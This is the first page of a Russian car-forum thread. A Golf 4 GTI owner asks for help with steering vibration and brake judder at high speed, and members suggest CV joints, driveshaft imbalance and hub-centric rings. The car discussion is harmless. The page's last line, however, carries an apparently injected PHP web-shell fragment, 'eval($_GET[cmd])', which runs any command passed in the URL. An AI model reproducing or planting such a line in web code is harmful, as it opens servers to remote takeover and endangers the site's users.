+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя
Показано с 1 по 10 из 22

Тема: ПОМОГИТЕ!!!РУКИ ОПУСКАЮТСЯ!!!!!!!ВИБРАЦИЯ!!!!


  1. #1
    GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    Регистрация
    16.11.2007
    Откуда
    Москва
    Сообщений
    246

    ПОМОГИТЕ!!!РУКИ ОПУСКАЮТСЯ!!!!!!!ВИБРАЦИЯ!!!!

    машина гольф 4.гти. у пред владельца тормозные диски начинали бить через 3-4 тыщи км. купил гольф стоковый!!! когда купил и гнал с петрозаводска на 16 дисках..чувствовалась легкая вибрация на которую можно не обращать внимания на руле при движение. торм диски били перед.по приезду в мск
    поменял сразу передние ступичные. рулевые тяги. сайлент блоки от тт. задний ступичный левый. правый ок. подвеску бильштайн б14 винты. колеса прокатал. тормоза поставил от порша 6 поршневые. диски от гольф 4 р32 334 толщина 32 фирма ЕВС.цена 15 оба диска. оч редкие.

    проездил 15 тыщ и при нажатии на тормоз сильно на скорости за 110 в руль колотит..меньше 100 то руль не колотит и вибрация на руле при движении стала больше на скорости за 120... и накатом и на нейтралке и на скорости.одинакова. на разгоне иногда не чувствую.
    опять поменял передние ступичные так же передние ступицы. проточил диски передние.рулевые тяги всборе. после проточки дисков осталось тож самое. взял такие же бу диски у друга у него не били..тоже так же бьют при скорости за 120 и выше при активном торможении..ниже 100 не особо чувствую что бьет. на скорости так же вибрация и накатом и и на разгоне после 120.
    колесные диски ровные. балансировка идеальная!!! не меняные только привода всборе спереди. резина новая.

    еще когда купил его то была такая штука. особенно когда холодный и зима...када ток ехать начинаешь и катишь километра 5 в час. резко нажать газ и отпустить то щелчок как буто упирается во что-то при нажатии и щелчок когда газ так же резко отпускаю... когда погода теплая то такого нет и когда нагреется что-то там тоже по зиме.

    так же есть едва заметная легкая вибрация на руле когда едешь километров 100 в час.диски колесные 18. но когда не било то ездил и не парился на эту вибрацию.была легкая.

    что делать???? руки опускаются блин. тормозные диски новые купить за 16 к и откатать опять 10 тык и опять забьют это жесть. или купить привода в сборе. но опять же таки не факт что решит проблему.
    не знаю что делать.

    машина гольф 4 гти

  2. #2
    GTI-Racing Quizzus will become famous soon enough Аватар для Quizzus
    Регистрация
    03.10.2008
    Откуда
    Moscow
    Машина
    GTI EDITION 30
    Сообщений
    748
    У меня такое было, извиняюсь, на москвиче 2141 в свое время, запарился все менять, а в итоге оказалось дело в шрусах, как только их поменял, все стало идеально)

  3. #3
    GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    Регистрация
    16.11.2007
    Откуда
    Москва
    Сообщений
    246
    Цитата Сообщение от Quizzus Посмотреть сообщение
    У меня такое было, извиняюсь, на москвиче 2141 в свое время, запарился все менять, а в итоге оказалось дело в шрусах, как только их поменял, все стало идеально)
    я за последние 4 дня вбухал тыщ 50 уже.протачивал в разных местах диски. и на биби... про кат станком. и в мади возил...и стоковые тормоза во дворе ставил за час. пока новые диски то терпимо ездить но все равно есть терпимая вибрация на руль..на которую можно забить.... уже сжечь его готов млиа. стоковые тормоза вожу в багажнике..на случай если опять психану..на стоке 3 дня покатался и больше не выдержал..... дымят не тормозят и т.д. это мрак


    что мне делать?????????? подскажите!!!!!!!!!!!!!!

  4. #4
    GTI-Racing DepecheR is on a distinguished road Аватар для DepecheR
    Регистрация
    21.01.2012
    Откуда
    Railway-City
    Машина
    Rennrad
    Сообщений
    856
    У приводов скорее всего дисбаланс, по-моему это можно проверить в любом нормальном сервисе, специальной приспособой (прежде чем разоряться на новые)!
    -=Мой конструктор "Юность-35": https://www.drive2.ru/r/volkswagen/288230376152074605/=-

  5. #5
    GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    Регистрация
    16.11.2007
    Откуда
    Москва
    Сообщений
    246
    куда ехать та? помогите блин:)

    еслиб у меня была вибрация под нагрузкой разгоне то недумая махнул бы привода в сборе.
    но у меня что при разгоне что накатом одинакова.

  6. #6
    Авто Года 2010 Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Чуйкин has a spectacular aura about Аватар для Чуйкин
    Регистрация
    12.04.2006
    Откуда
    Москвабад
    Машина
    Golf 1.8t 460лс 520Нм
    Сообщений
    2,543
    поставь сток тормоза и попробуй без проставок колеса поставить пока еще денег не вбухал

  7. #7
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Цитата Сообщение от DepecheR Посмотреть сообщение
    У приводов скорее всего дисбаланс, по-моему это можно проверить в любом нормальном сервисе, специальной приспособой (прежде чем разоряться на новые)!
    +1 Надо проверить диски на биение. Если нормально - дело в приводе.

    Я проверял на сервисе ул. Приорова, 26, т. 8-905-5девятьдевять6664 у Эдуарда. А так - обзвони сервисы поближе к дому, много где есть приспособа.
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  8. #8
    GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    Регистрация
    16.11.2007
    Откуда
    Москва
    Сообщений
    246
    на счет дисков. приехал в какое то место русаковка дом 1. типа рлд контора..грю тип снимайте нах диски и катайте...сняли и на станок прокрутить..говорят типа пошел я в жопу у меня все в идеале и балансировка в ноль... остаются привода..

    жопа же не может давать такую вибру ну никак

  9. #9
    GTI-Racing NAGROM85 is on a distinguished road Аватар для NAGROM85
    Регистрация
    18.09.2010
    Откуда
    Нижневартовск
    Машина
    AUDI 2.7T 300hp
    Сообщений
    129
    у меня подобная проблема.только начал с этим разбираться.сейчас на 125-130 начинается вибрация на руль,и сам прикол в том что не всегда,бывает разгоняешься и ничего,следующий разгон-биение,короче хрень полная.при торможении не бьет,колеса 18 от р32,тоесть на ступице сидят четко.тормоза брембо 4 поршня.
    с чего буду начинать
    -уже отбалансировал колеса,не помогло
    -прокатать диски,они чуток мятые
    -проточить тормозные диски
    -вваливать бабло как Ronny)
    кстати,Ronny,у меня на зимних озах тоже било,перепробовал все,потом купил пластиковые колечки на ступицу,которые компенсировали разницу неродных дисков и проблема решилась.хотя меня и убеждали что колесо можно отцентровать болтами,а оказалось все не так.так что попробуй,чем не шутит...и еще,болты у тебя правильные?типа сфера или конус под диск.

  10. #10
    GTI-Racing Ronny is on a distinguished road Аватар для Ronny
    Регистрация
    16.11.2007
    Откуда
    Москва
    Сообщений
    246
    болты правильные.... на зимних колесах тоже самое. проставочных колец нет. проставка выточена четко под колеса и ступицы. диски тормозные начинали бить после тыщ 5 пробега....
    остается только привода... даже на 16 дисках была легкая вибра...это реально жесть...

+ Ответить в теме
Страница 1 из 3 1 2 3 ПоследняяПоследняя

Похожие темы

  1. Кривые руки россии!
    от MORG m-customs в разделе Курилка
    Ответов: 3
    Последнее сообщение: 28.11.2023, 14:04
  2. Из рук в руки – продажа авто
    от avtotranskont в разделе Курилка
    Ответов: 0
    Последнее сообщение: 22.12.2013, 20:48
  3. Резонатор APR RSC в добрые руки
    от КИБАЛЬЧИШЬ в разделе Покупка и продажа запчастей
    Ответов: 16
    Последнее сообщение: 12.08.2011, 14:49
  4. Отдам в хорошие руки)))
    от Leo_GTI в разделе Покупка и продажа авто
    Ответов: 6
    Последнее сообщение: 06.11.2007, 02:16
  5. Обороты не опускаются ниже 1000
    от De-lazar в разделе Двигатель
    Ответов: 7
    Последнее сообщение: 11.09.2006, 15:10

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}